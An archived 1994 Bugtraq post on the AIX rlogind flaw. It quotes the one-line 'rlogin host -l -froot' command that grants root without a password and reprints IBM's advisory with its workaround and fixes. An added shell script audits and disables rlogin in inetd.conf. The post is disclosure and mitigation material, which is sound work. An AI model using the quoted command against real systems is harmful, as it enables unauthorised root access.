Bugtraq archives for 3rd quarter (Jul-Sep) 1994: Re: -froot??? (AIX rlogin bug)

Re: -froot??? (AIX rlogin bug)

Mark G. Scheuern (mgscheuevela.acs.oakland.edu)
Sat, 30 Jul 1994 07:52:22 -0400

>Someone over on the firewalls mailing list just threw out this tidbit:
>
>   rlogin aix.machine -l -froot
>
>For instance:
> 
>   rlogin foobar -l -froot
>
>This gives you root access on any AIX 3.2.X machine.
>
>Does anyone have any history on this trapdoor?  Apparently
>it also existed in Linux several generations ago.
>
>>>>>>>Ericw

This popped up some weeks ago.  This rlogind bug has been around
for a long time;  it's also in AIX 3.1.X.  Here's IBM's statement:

-----------------------------------------------------------------

 {URGENT - AIX SECURITY EXPOSURE}

 May 20, 1994

 IBM has just become aware of an AIX security exposure that
 makes it possible to remote login to any AIX Version 3
 system as the root user without a password.

 As described below, a workaround is immediately available
 which eliminates the security exposure by disabling remote
 login.  An emergency fix is also available immediately
 to rectify the AIX problem so that remote login can be
 enabled with no security exposure.

 An APAR has been opened and an official PTF will be
 made available, in approximately two weeks, for installed
 AIX systems and included in all new AIX shipments.

 IBM hopes its efforts to respond rapidly to this problem will
 allow customers to eliminate this security exposure with
 minimal disruption.

 {IMMEDIATE WORKAROUND:}

 The recommended workaround is to disable rlogin in the /etc/inetd.conf
 file using the following procedure:

             1. As root, edit /etc/inetd.conf
             2. Comment out the line 'login ... rlogin'
             3. Run 'inetimp'
             4. Run 'refresh -s inetd'

 {EMERGENCY FIX:}

 Emergency Fixes for the different levels of AIX affected by
 this exposure will be available via anonymous ftp from
 software.watson.ibm.com.  The files will be located
 in /pub/rlogin in compressed tar format.

 {OFFICIAL FIX:}

 The official fix for this problem can be ordered as
 Authorized Program Analysis Report (APAR) IX44254.
 To order an APAR from IBM in the U.S. call 1-800-237-5511
 and ask for shipment as soon as it is available.  APARs
 may be obtained outside the U.S. by contacting your local
 IBM representative.

 For questions regarding this information, please contact
 Frank Karner (KARNER at AUSTIN; TL/793-5950; 512-823-5950).


-----------------------------------------------------------------

When I told one of our on-site IBM droids about this, he didn't
believe it.  "No way, the government buys these machines because
they're Class B secure!"  So I showed him...  I also saw an
IBM spokesperson describe this in a trade publication as requiring
"a complex series of commands".  Hell, it's easier than logging
in the usual way, with the password.

Mark Scheuern
Chrysler Corp.
"I don't speak for Chrysler"
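The inetd.conf workaround from the IBM statement above (comment out the 'login ... rlogin' line, then inetimp and refresh -s inetd), written up as an added example that is not part of the original post or of IBM's advisory. It assumes a BSD/AIX-style inetd.conf layout and works on a constructed sample file by default; the INETD_CONF variable, the function names and the sample contents are this example's own.

```shell
#!/bin/sh
# Added example, not from the original post or IBM's statement: audit an
# inetd.conf for an active rlogin entry and apply the advisory's workaround.
# INETD_CONF defaults to a constructed sample; on an AIX host point it at
# /etc/inetd.conf and run the functions as root.

INETD_CONF="${INETD_CONF:-./inetd.conf.sample}"

# Constructed sample standing in for /etc/inetd.conf, with rlogin enabled.
write_sample_inetd_conf() {
    cat > "$INETD_CONF" <<'EOF'
## constructed sample inetd.conf, not copied from any real system
ftp     stream  tcp  nowait  root  /usr/sbin/ftpd     ftpd
telnet  stream  tcp  nowait  root  /usr/sbin/telnetd  telnetd
shell   stream  tcp  nowait  root  /usr/sbin/rshd     rshd
login   stream  tcp  nowait  root  /usr/sbin/rlogind  rlogind
exec    stream  tcp  nowait  root  /usr/sbin/rexecd   rexecd
EOF
}

# Audit check: succeeds (exit 0) while an uncommented 'login' entry still
# hands connections to rlogind, i.e. while the workaround is not in place.
rlogin_enabled() {
    grep -q '^[[:space:]]*login[[:space:]].*rlogind' "$INETD_CONF"
}

# Workaround steps 1-2: back up the file, then comment out every active
# 'login ... rlogind' line. Prints the number of lines commented out.
disable_rlogin() {
    n=$(grep -c '^[[:space:]]*login[[:space:]].*rlogind' "$INETD_CONF" || true)
    cp "$INETD_CONF" "$INETD_CONF.bak"
    tmp="$INETD_CONF.tmp.$$"
    sed 's/^\([[:space:]]*login[[:space:]].*rlogind\)/#\1/' "$INETD_CONF" > "$tmp" &&
        mv "$tmp" "$INETD_CONF"
    echo "$n"
}

# Workaround steps 3-4: re-import inetd.conf and restart inetd through the
# AIX System Resource Controller. Both commands are AIX-only, so they are
# skipped elsewhere rather than failing.
reload_inetd() {
    if command -v inetimp >/dev/null 2>&1; then
        inetimp && refresh -s inetd
    else
        echo "inetimp not found; skipping AIX inetd reload" >&2
    fi
}
```

Run rlogin_enabled before and after disable_rlogin to confirm the entry is gone, then reload_inetd so the running inetd picks up the change.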